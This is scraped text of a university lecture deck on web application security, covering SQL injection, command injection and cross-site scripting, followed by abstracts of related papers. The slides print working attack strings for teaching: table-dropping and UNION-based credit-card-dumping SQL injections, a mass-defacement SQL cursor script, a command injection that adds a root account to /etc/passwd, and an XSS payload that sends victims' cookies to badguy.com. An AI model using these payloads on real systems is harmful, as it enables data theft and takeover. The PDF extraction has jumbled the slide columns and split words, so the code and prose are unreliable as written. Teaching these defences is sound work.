Web Application Code Common Vulnerabilities SQL Injection

Total Page:16

File Type:pdf, Size:1020Kb

Web Application Code Common Vulnerabilities SQL Injection CS 155 Spring 2009 Schematic web site architecture WS1 Firewall Firewall Application Load Secure Web Site Design Firewall WS App Balancer 2 DB (WAF) Servers WS3 John Mitchell IDS Authorization Netegrity (CA) Oblix (Oracle) 1 2 Web application code Common vulnerabilities Runs on web server or app server. SQL Injection Takes input from web users (via web server) Browser sends malicious input to server rd Interacts with the database and 3 parties. Sans Bad input checking leads to malicious SQL query Prepares results for users (via web server) Top XSS – Cross-site scripting 10 Examples: BdBad we b s ite sen ds innocent v itiictim a scri itthtpt that steals information from an honest web site Shopping carts, home banking, bill pay, tax prep, … CSRF – Cross-site request forgery New code written for every web site. Bad web site sends request to good web site, using Written in: credentials of an innocent victim who “visits” site C, PHP, Perl, Python, JSP, ASP, … Other problems Often written with little consideration for security HTTP response splitting, site redirects, … 3 4 Dynamic Web Application GET / HTTP/1.0 Browser Web SQL Injection server HTTP/1.1 200 OK index.php with slides from Neil Daswani Database server 5 6 1 PHP: Hypertext Preprocessor SQL Server scripting language with C-like syntax Widely used database query language Can intermingle static HTML and code Fetch a set of records <input value=<?php echo $myvalue; ?>> SELECT * FROM Person WHERE Username=‘grader’ Can embed variables in double-quote strings Add data to the table $user = “world”; echo “Hello $user!”; INSERT INTO Person (Username, Zoobars) or $user = “world”; echo “Hello” . $user . “!”; VALUES (‘grader’, 10) Form data in global arrays $_GET, $_POST, … Modify data UPDATE Person SET Zoobars=42 WHERE PersonID=5 Query syntax (mostly) independent of vendor 7 8 Example Basic picture: SQL Injection Sample PHP Victim Server $recipient = $_POST[‘recipient’]; $sql = "SELECT PersonID FROM Person WHERE 1 Username='$recipient'"; 2 $rs = $db->executQteQuery($sql); unintended Problem 3 receive valuable data query Attacker What if ‘recipient’ is malicious string that changed the meaning of the query? Victim SQL DB 9 10 CardSystems Attack April 2008 SQL Vulnerabilities CardSystems credit card payment processing company SQL injection attack in June 2005 put company out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed 11 2 Main steps in this attack Part of the SQL attack string DECLARE @T varchar(255),@C varchar(255) Use Google to find sites using a particular ASP style DECLARE Table_Cursor CURSOR vulnerable to SQL injection FOR select a.name,b.name from sysobjects a,syscolumns b where Use SQL injection on these sites to modify the page to a.id=b.id and a.xtype='u' and include a link to a Chinese site nihaorr1.com (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) Don't visit this site yourself! OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C The site (nihaorr1.com) serves JavaScript that exploits WHILE(@@FETCH_STATUS=0) BEGIN vulnerabilities in IE, RealPlayer, QQ Instant Messenger exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'‘ ''') Steps (1) and (2) are automated in a tool that can be configured to FETCH NEXT FROM Table_Cursor INTO @T,@C inject whatever you like into vulnerable sites END CLOSE Table_Cursor There is some evidence that hackers may get paid for each visit to DEALLOCATE Table_Cursor; nihaorr1.com DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST( %20AS%20NVARCHAR(4000));EXEC(@S);-- 13 14 SQL Injection Examples Type 1 Attack Example Enter Username & SELECT passwd Web FROM USERS Password Web Browser WHERE uname DB Server (Client) IS ‘$username’ Attacker will modify 15 Malicious input SQL Injection Examples Malicious Query Enter Username SELECT passwd & FROM USERS Web Password Web WHERE uname Browser DB Server IS ‘’;DROPTABLE; DROP TABLE (Client) USERS; -- ‘ Eliminates all user Attacker Modifies Input accounts 17 3 What is SQL Injection? SQL Injection Examples Input Validation Vulnerability View pizza order history:<br> Untrusted user input in SQL query sent to back-end <form method="post" action="..."> database without sanitizing the data Month <select> <option name="month" value="1">Jan</option> Specific case of more general command injection ... Inserting untrusted input into a query or command <option name="month" value="12">Dec</option> </select> Year Why is this Bad? <p> <input type=submit name=submit value=View> Data can be misinterpreted as a command </form> Can alter the intended effect of command or query Attacker can post form that is not generated by this page. 19 20 SQL Injection Examples SQL Injection Examples Normal SELECT pizza, toppings, quantity, order_day FROM orders SQL WHERE userid=4123 All User Data Query AND order_month=10 Compromised Type 2 For ordhder_month parametttklditter, attacker could input Attack WHERE condition 0 OR 1=1 is always true! Gives attacker access to other users’ Malicious … private data! Query WHERE userid=4123 AND order_month=0 OR 1=1 21 22 SQL Injection Examples SQL Injection Examples A more damaging breach of user privacy: For order_month parameter, attacker could input 0 AND 1=0 Credit Card Info UNION SELECT cardholder, number, exp_month, exp_year Compromised FROM creditcards Attacker is able to Combine the results of two queries Empty table from first query with the sensitive credit card info of all users from second query 23 24 4 More Attacks Second-Order SQL Injection • Create new users: Second-Order SQL Injection: attack where data ‘; INSERT INTO USERS (‘uname’,’passwd’, stored in database is later used to conduct SQL ‘salt’) VALUES (‘hacker’,’38a74f’, 3234); injection Example: this vulnerability could exist if string Password reset: • escapiiing is appli lidiittled inconsistently ‘; UPDATE USERS SET [email protected] WHERE [email protected] Solution: Treat ALL parameters as dangerous UPDATE USERS SET passwdpasswd='cracked'='cracked' WHERE uname='admin'uname='admin' --''-- attacker chooses username 'admin' -- Strings not escaped! 26 Preventing SQL Injection Escaping Quotes Input validation For valid string inputs like username o’connor, use Filter escape characters Apostrophes, semicolons, percent symbols, hyphens, Ex: escape(o’connor) = o’’connor underscores, … only works for string inputs Any character that has special meanings Check th e d at a t ype ( e.g., mak e sure it’ s an in teger ) Whitelisting Blacklisting chars doesn’t work forget to filter out some characters could prevent valid input (e.g. username O’Brien) Allow only well-defined set of safe values Set implicitly defined through regular expressions 28 Prepared Statements Prepared Statement:Example Metacharacters (e.g. ‘) in queries provide distinction between data & control PreparedStatement ps = db.prepareStatement("SELECT pizza, toppings, quantity, order_day " Most attacks: data interpreted as control / + "FROM orders WHERE userid=? AND order_month=?"); alters the semantics of a query/cmd ps.setInt(1, session.getCurrentUserId()); Bind Variables: ? placeholders guaranteed to be data ps.setInt(2, Integgper.parseInt(reqqguest.getParamenter("month"))) ; ResultSet res = ps.executeQuery(); (not control) Bind Variable: Prepared Statements allow creation of static queries Data Placeholder with bind variables → preserves the structure of • query parsed w/o parameters intended query • bind variables are typed e.g. int, string, etc…* 29 5 Parameterized SQL Mitigating Impacts Build SQL queries by properly escaping args: ′ → \′ Prevent Schema & Information Leaks Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. Limit Privileges (Defense-in-Depth) SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE EtSitiDttdiDtbEncrypt Sensitive Data stored in Database username = @User AND password = @Pwd", dbConnection); Harden DB Server and Host OS cmd.Parameters.Add("@User", Request[“user”] ); cmd.Parameters.Add("@Pwd", Request[“pwd”] ); Apply Input Validation cmd.ExecuteReader(); 31 32 Other command injection Example: PHP server-side code for sending email $email = $_POST[“email”] $subject = $_POST[“subject”] Cross Site Scripting (XSS) system(“mail $email –s $subject < /tmp/joinmynetwork”) Attac ker can pos t http://yourdomain.com/mail.pl? [email protected]& subject=foo < /usr/passwd; ls OR http://yourdomain.com/mail.pl? [email protected]&subject=foo; echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls Basic scenario: reflected XSS attack The setup Attack Server User input is echoed into HTML response. 1 2 Example: search field 5 http://victim.com/search.php ? term = apple search.php responds with: Victim client <HTML> <TITLE> Search Results </TITLE> <BODY> Victim Server Results for <?php echo $_GET[term] ?> : . </BODY> </HTML> Is this exploitable? 36 6 Bad input Attack Server Consider link: (properly URL encoded) www.attacker.com http://victim.com/search.php ? term = http://victim.com/search.php ? <script> window.open( term = <script> ... </script> “http://badguy.com?cookie = ” + Victim client document. cookie )</) </script> What if user clicks on this link? Victim Server 1. Browser goes to victim.com/search.php www.victim.com 2. Victim.com returns <html> <HTML> Results for <script> … Results for </script> <script> window.open(http://attacker.com? 3. Browser executes script: ... document.cookie ...) Sends badguy.com cookie for victim.com </script>
Recommended publications
  • Introduction
    HTTP Request Smuggling in 2020 – New Variants, New Defenses and New Challenges Amit Klein SafeBreach Labs Introduction HTTP Request Smuggling (AKA HTTP Desyncing) is an attack technique that exploits different interpretations of a stream of non-standard HTTP requests among various HTTP devices between the client (attacker) and the server (including the server itself). Specifically, the attacker manipulates the way various HTTP devices split the stream into individual HTTP requests. By doing this, the attacker can “smuggle” a malicious HTTP request through an HTTP device to the server abusing the discrepancy in the interpretation of the stream of requests and desyncing between the server’s view of the HTTP request (and response) stream and the intermediary HTTP device’s view of these streams. In this way, for example, the malicious HTTP request can be "smuggled" as a part of the previous HTTP request. HTTP Request Smuggling was invented in 2005, and recently, additional research cropped up. This research field is still not fully explored, especially when considering open source defense systems such as mod_security’s community rule-set (CRS). These HTTP Request Smuggling defenses are rudimentary and not always effective. My Contribution My contribution is three-fold. I explore new attacks and defense mechanisms, and I provide some “challenges”. 1. New attacks: I provide some new HTTP Request Smuggling variants and show how they work against various proxy-server (or proxy-proxy) combinations. I also found a bypass for mod_security CRS (assuming HTTP Request Smuggling is possible without it). An attack demonstration script implementing my payloads is available in SafeBreach Labs’ GitHub repository (https://github.com/SafeBreach-Labs/HRS).
    [Show full text]
  • Domain Name Systems-Based Electronic Mail Security
    DRAFT NIST CYBERSECURITY PRACTICE GUIDE DOMAIN NAME SYSTEMS-BASED ELECTRONIC MAIL SECURITY Scott Rose William C. Barker Santos Jha Chinedum Irrechukwu Karen Waltermire NIST SPECIAL PUBLICATION 1800-6 (INCLUDING PARTS A, B, C) ADDITIONAL CONTENT: https://nccoe.nist.gov/projects/building_blocks/ DRAFT NIST Special Publication 1800-6 NIST Cybersecurity Practice Guide DOMAIN NAME SYSTEMS- BASED ELECTRONIC MAIL SECURITY 1800-6A Scott Rose Executive Summary Information Technology Laboratory National Institute of Standards and Technology 1800-6B Approach, Architecture, and William C. Barker Security Characteristics Dakota Consulting For CIOs, CSOs, and Security Managers Silver Spring, MD 1800-6C Santos Jha How-To Guides Chinedum Irrechukwu For Security Engineers The MITRE Corporation McLean, VA Karen Waltermire National Cybersecurity Center of Excellence National Institute of Standards and Technology November 2016 U.S. Department of Commerce Penny Pritzker, Secretary National Institute of Standards and Technology Willie May, Under Secretary of Commerce for Standards and Technology and Director DRAFT DISCLAIMER Certain commercial entities, equipment, products, or materials may be identified in this document in order to describe an experimental procedure or concept adequately. Such identification is not intended to imply recommendation or endorsement by NIST or NCCoE, nor is it intended to imply that the entities, equipment, products, or materials are necessarily the best available for the purpose. National Institute of Standards and Technology Special Publication 1800-6 Natl Inst. Stand. Technol. Spec. Publ. 1800-6, 221 pages (November 2016) CODEN: NSPUE2 Organizations are encouraged to review all draft publications during public comment periods and provide feedback. All publications from NIST’s National Cybersecurity Center of Excellence are available at http://nccoe.nist.gov.
    [Show full text]
  • Finding Security Vulnerabilities in Java Applications with Static Analysis
    Finding Security Vulnerabilities in Java Applications with Static Analysis V. Benjamin Livshits and Monica S. Lam Computer Science Department Stanford University {livshits, lam}@cs.stanford.edu Abstract curity breach and an average episode results in close to $4 million in losses [10]. A recent penetration test- This paper proposes a static analysis technique for ing study performed by the Imperva Application De- detecting many recently discovered application vulner- fense Center included more than 250 Web applications abilities such as SQL injections, cross-site scripting, and from e-commerce, online banking, enterprise collabo- HTTP splitting attacks. These vulnerabilities stem from ration, and supply chain management sites [54]. Their unchecked input, which is widely recognized as the most vulnerability assessment concluded that at least 92% of common source of security vulnerabilities in Web appli- Web applications are vulnerable to some form of hacker cations. We propose a static analysis approach based on attacks. Security compliance of application vendors is a scalable and precise points-to analysis. In our system, especially important in light of recent U.S. industry reg- user-provided specifications of vulnerabilities are auto- ulations such as the Sarbanes-Oxley act pertaining to in- matically translated into static analyzers. Our approach formation security [4, 19]. finds all vulnerabilities matching a specification in the statically analyzed code. Results of our static analysis A great deal of attention has been given to network- are presented to the user for assessment in an auditing level attacks such as port scanning, even though, about interface integrated within Eclipse, a popular Java devel- 75% of all attacks against Web servers target Web-based opment environment.
    [Show full text]
  • Cache-Poisoned Denial-Of-Service Attack
    Your Cache Has Fallen: Cache-Poisoned Denial-of-Service Attack Hoai Viet Nguyen, Luigi Lo Iacono Hannes Federrath Data & Application Security Group Security in Distributed Systems Group Cologne University of Applied Sciences, Germany University of Hamburg, Germany {viet.nguyen,luigi.lo_iacono}@th-koeln.de [email protected] ABSTRACT 1 INTRODUCTION Web caching enables the reuse of HTTP responses with the aim Contemporary distributed software systems require to scale at large to reduce the number of requests that reach the origin server, the in order to efficiently handle the sheer magnitude of requests stem- volume of network traffic resulting from resource requests, and ming, e.g., from human users all over the globe or sensors scattered the user-perceived latency of resource access. For these reasons, around in an environment. A common architectural approach to a cache is a key component in modern distributed systems as it cope with this requirement is to design the system in layers com- enables applications to scale at large. In addition to optimizing posed of distinct intermediaries. Application-level messages travel performance metrics, caches promote additional protection against through such intermediate systems on their path between a client Denial of Service (DoS) attacks. and a server. Common intermediaries include caches, firewalls, load In this paper we introduce and analyze a new class of web cache balancers, document routers and filters. poisoning attacks. By provoking an error on the origin server that The caching of frequently used resources reduces network traffic is not detected by the intermediate caching system, the cache gets and optimizes application performance and is one major pillar of poisoned with the server-generated error page and instrumented success of the web.
    [Show full text]
  • Response Splitting – HTTP Request Smuggling HTTP Response Splitting
    CSC 405 Introduction to Computer Security Web Security Alexandros Kapravelos [email protected] (Derived from slides by Giovanni Vigna) Logic Flaws • Logic flaws come in many forms and are specific to the intended functionality and security policy of an application • Received little attention – Are known to be hard to identify in automated analysis – Not much public information • Are on the rise: “…as the number of common vulnerabilities such as SQL injection and cross-site scripting are reduced, the bad guys are increasing their attacks on business logic flaws” [J. Grossman, WhiteHat Security] Fear the EAR • Execution-After-Redirect vulnerabilities are introduced when code is executed after producing a redirect header • The developer assumes that since a redirection occurred, code execution stopped – Redirect used as a goto • Normally the behavior is invisible to the user, because the browser automatically load the page referenced by the redirection HTTP Redirects GET /user/info HTTP/1.1 Host: example.com HTTP/1.1 302 Moved Location: http://example.com/login GET /login HTTP/1.1 Host: example.com Execution After Redirect: Example class TopicsController < ApplicationController def update @topic = Topic.find(params[:id]) if not current_user.is_admin? redirect_to(“/”) end @topic.update_attributes(params[:topic]) flash[:notice] = “Topic updated!” end end EAR History • 17 Common Vulnerabilities and Exposures (CVE) – Starting in 2007 – Difficult to find – no consistent category • Blog post about Cake PHP 2006 – Resulted in a bug filed and documentation
    [Show full text]
  • Threat Classification Version: 1.00
    Web Application Security Consortium: Threat Classification www.webappsec.org Version: 1.00 Description The Web Security Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language for web security related issues. Goals • Identify all known web application security classes of attack. • Agree on naming for each class of attack. • Develop a structured manner to organize the classes of attack. • Develop documentation that provides generic descriptions of each class of attack. Documentation Uses Further understand and articulate the security risks that threaten web sites. Enhance secure programming practices to prevent security issues during application development. Serve as a guideline to determine if web sites have been designed, developed, and reviewed against all the known threats. Assist with understanding the capabilities and selection of web security solutions. 1 Copyright 2004, Web Application Security Consortium. All rights reserved. Table of Contents DESCRIPTION 1 GOALS 1 DOCUMENTATION USES 1 TABLE OF CONTENTS 2 OVERVIEW 4 BACKGROUND 5 CONTRIBUTORS 6 CHECKLIST 7 CLASSES OF ATTACK 10 1 Authentication 10 1.1 Brute Force 10 1.2 Insufficient Authentication 11 1.3 Weak Password Recovery Validation 12 2 Authorization 14 2.1 Credential/Session Prediction 14 2.2 Insufficient Authorization 16 2.3 Insufficient Session Expiration 17 2.4 Session Fixation 18 3 Client-side Attacks 21 3.1 Content Spoofing 21 3.2 Cross-site Scripting 24 4 Command Execution 27 4.1 Buffer Overflow 27 4.2 Format String Attack 28 4.3 LDAP Injection 30 4.4 OS Commanding 33 4.5 SQL Injection 36 2 Copyright 2004, Web Application Security Consortium.
    [Show full text]
  • Network Monitoring for Web-Based Threats
    Network Monitoring for Web-Based Threats Matthew Heckathorn February 2011 TECHNICAL REPORT CMU/SEI-2011-TR-005 ESC-TR-2011-005 CERT® Program Unlimited distribution subject to the copyright. http://www.sei.cmu.edu This report was prepared for the SEI Administrative Agent ESC/XPK 5 Eglin Street Hanscom AFB, MA 01731-2100 The ideas and findings in this report should not be construed as an official DoD position. It is published in the interest of scientific and technical information exchange. This work is sponsored by the U.S. Department of Defense. The Software Engineering Institute is a federally funded research and development center sponsored by the U.S. Department of Defense. Copyright 2011 Carnegie Mellon University. NO WARRANTY THIS CARNEGIE MELLON UNIVERSITY AND SOFTWARE ENGINEERING INSTITUTE MATERIAL IS FURNISHED ON AN “AS-IS” BASIS. CARNEGIE MELLON UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED, AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR PURPOSE OR MERCHANTABILITY, EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT. Use of any trademarks in this report is not intended in any way to infringe on the rights of the trademark holder. Internal use. Permission to reproduce this document and to prepare derivative works from this document for internal use is granted, provided the copyright and “No Warranty” statements are included with all reproductions and derivative works. External use. This document may be reproduced in its entirety, without modification, and freely distributed in written or electronic form without requesting formal permission.
    [Show full text]
  • Code Review Guide
    CODE REVIEW GUIDE 2.0 RELEASE Project leaders: Larry Conklin and Gary Robinson Creative Commons (CC) Attribution Free Version at: https://www.owasp.org 1 1 Introduction Foreword Acknowledgements Introduction How To Use The Code Review Guide 3 5 6 8 2 Secure Code Review 9 Methodology 20 3 Technical Reference For Secure Code Review Appendix A1 Injection 43 Code Review Do’s And Dont’s 192 A2 Broken Authentication And Session Management 58 Code Review Checklist 196 A3 Cross-Site Scripting (XSS) 70 Threat Modeling Example 200 A4 Insecure Direct Object Reference 77 Code Crawling 206 A5 Security Misconfguration 82 A6 Sensitive Data Exposure 117 A7 Missing Function Level Access Control 133 A8 Cross-Site Request Forgery (CSRF) 139 A9 Using Components With Know Vulnerabilities 146 A10 Unvalidated Redirects And Forwards 149 4 HTML5 154 Same Origin Policy 158 Reviewing Logging Code 160 Error Handling 163 Reviewing Security Alerts 175 Review For Active Defence 178 Race Conditions 181 Bufer Overruns 183 Client Side JavaScript 188 2 1 Code Review Guide Foreword - By Eoin Keary 3 1 FOREWORD By Eoin Keary, Long Serving OWASP Global Board Member The OWASP Code Review guide was originally born from the OWASP Testing Guide. Initially code review was covered in the Testing Guide, as it seemed like a good idea at the time. Howev- er, the topic of security code review is too big and evolved into its own stand-alone guide. I started the Code Review Project in 2006. This current edition was started in April 2013 via the OWASP Project Reboot initia- tive and a grant from the United States Department of Home- land Security.
    [Show full text]
  • Http Request Smuggling
    HTTP REQUEST SMUGGLING CHAIM LINHART ([email protected]) AMIT KLEIN ([email protected]) RONEN HELED AND STEVE ORRIN ([email protected]) A whitepaper from Watchfire TABLE OF CONTENTS Abstract ............................................................................................................................. 1 Executive Summary ........................................................................................................ 1 What is HTTP Request Smuggling?............................................................................ 2 What damage can HRS inflict?..................................................................................... 2 Example #1: Web Cache Poisoning ............................................................................. 4 Example #2: Firewall/IPS/IDS evasion ....................................................................... 5 Example #3: Forward vs. backward HRS ................................................................... 7 Example #4: Request Hijacking ................................................................................... 9 Example #5: Request Credential Hijacking............................................................. 10 HRS techniques............................................................................................................. 10 Protecting your site against HRS ............................................................................... 19 Squid ..............................................................................................................................
    [Show full text]
  • Owasp Ruby on Rails Security Guide 2009 V2.0
    OWASP RUBY ON RAILS SECURITY GUIDE 2009 V2.0 © 2002-2009 OWASP Foundation This document is licensed under the Creative Commons Attribution-Share Alike 3.0 license. You must attribute your version to the OWASP Testing or the OWASP Foundation. Introduction 2 Author 2 About the Open Web Application Security Project 2 Sessions 2 What are sessions? 2 Session id 2 Session hijacking 2 Session guidelines 2 Session storage 2 Replay attacks for CookieStore sessions 2 Session fixation 2 Session fixation – Countermeasures 2 Session expiry 2 Cross-Site Reference Forgery (CSRF) 2 CSRF Countermeasures 2 Redirection and Files 2 Redirection 2 File uploads 2 Executable code in file uploads 2 File downloads 2 Intranet and Admin security 2 Additional precautions 2 Mass assignment 2 Countermeasures 3 User management 3 Brute-forcing accounts 3 Account hijacking 3 CAPTCHAs 3 Logging 3 Good passwords 3 Regular expressions 3 Privilege escalation 3 Injection 3 Whitelists versus Blacklists 3 SQL Injection 3 Cross-Site Scripting (XSS) 3 Examples from the underground 3 CSS Injection 3 Textile Injection 3 Ajax Injection 3 RJS Injection 3 Command Line Injection 3 Header Injection 3 Secure MySQL 3 Access rights 3 Users 3 MySQL users 3 Slow queries 4 Server Monitoring 4 Error notification 4 Monitoring 4 Additional Resources 4 Copyright 4 Introduction Web application frameworks are made to help developers building web applications. Some of them also help you secure the web application. In fact, one framework is not more secure than another: If you use it correctly, you will be able to build secure apps with many frameworks.
    [Show full text]
  • HTTP Response Splitting
    HTTP Response Splitting HTTP Response Splitting The Attack • HTTP Response Splitting is a protocol manipulation attack, similar to Parameter Tampering • The attack is valid only for applications that use HTTP to exchange data • Works just as well with HTTPS because the entry point is in the user visible data • There are a number of variations on the attack 2 HTTP Response Splitting The Attack • An HTTP message response includes two parts : – Message Headers – metadata that describes a request or response oEach terminated by a carriage return (\r) and a linefeed (\n) GET http://www.google.com/ HTTP/1.1\r\n Host: www.google.com\r\n User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1; Google-TR-5.7.806.10245-en) Gecko/2008070208 Firefox/3.0.1 Paros/3.2.13\r\n Accept: text/html,application/xhtml+xml,application/xml; q=0.9,*/*;q=0.8\r\n Accept-Language: en-us,en;q=0.5\r\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n Keep-Alive: 300\r\n Proxy-Connection: keep-alive\r\n 3 HTTP Response Splitting The Attack • Then the Message Body which is the raw data of the response <HTML>\r\n <HEAD>\r\n <TITLE>Your Title Here</TITLE>\r\n </HEAD>\r\n <BODY>\r\n </BODY>\r\n … </HTML>\r\n 4 HTTP Response Splitting The Attack • The Message Headers are also separated from the message body a carriage return/linefeed pair GET http://www.google.com/ HTTP/1.1 \r\n Host: www.google.com \r\n User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1; Google-TR- 5.7.806.10245-en) Gecko/2008070208 Firefox/3.0.1 Paros/3.2.13 \r\n Accept:
    [Show full text]
  • Improving Web Site Security with Data Flow Management by Alexander Siumann Yip
    Improving Web Site Security with Data Flow ACHUSETTS INSTITUTE Management MASS OF TECHNOLOGY by EP 30IBRRIES2009 Alexander Siumann Yip LIBRARIES S.B., Computer Science and Engineering (2001) M.Eng., Electrical Engineering and Computer Science (2002) Massachusetts Institute of Technology Submitted to the Department of Electrical Engineering and Computer Science in partial fulfillment of the requirements for the degree of Doctor of Philosophy in Computer Science at the MASSACHUSETTS INSTITUTE OF TECHNOLOGY September 2009 @ Massachusetts Institute of Technology 2009. All rights reserved. ARCHIVES Author ............. Departinent of E lltrical Engineering and Computer Science /A- August 21, 2009 Certified by yv.%'. .V. Robert T. Morris Associate Professor Thesis Supervisor Certified by........ .... Nickolai Zeldovich Assistant Professor ~ ,1 m"hesis Supervisor Accepted by........ /........Tery . ......a . Terry P. Orlando Chair, Department Committee on Graduate Students Improving Web Site Security with Data Flow Management by Alexander Siumann Yip Submitted to the Department of Electrical Engineering and Computer Science on August 21, 2009, in partial fulfillment of the requirements for the degree of Doctor of Philosophy in Computer Science Abstract This dissertation describes two systems, RESIN and BFLow, whose goal is to help Web developers build more secure Web sites. RESIN and BFLOW use data flow management to help reduce the security risks of using buggy or malicious code. RESIN provides programmers with language-level mechanisms to track and manage the flow of data within the server. These mechanisms make it easy for programmers to catch server-side data flow bugs that result in security vulnerabilities, and prevent these bugs from being exploited. BFLow is a system that adds information flow control, a restrictive form of data flow management, both to the Web browser and to the interface between a browser and a server.
    [Show full text]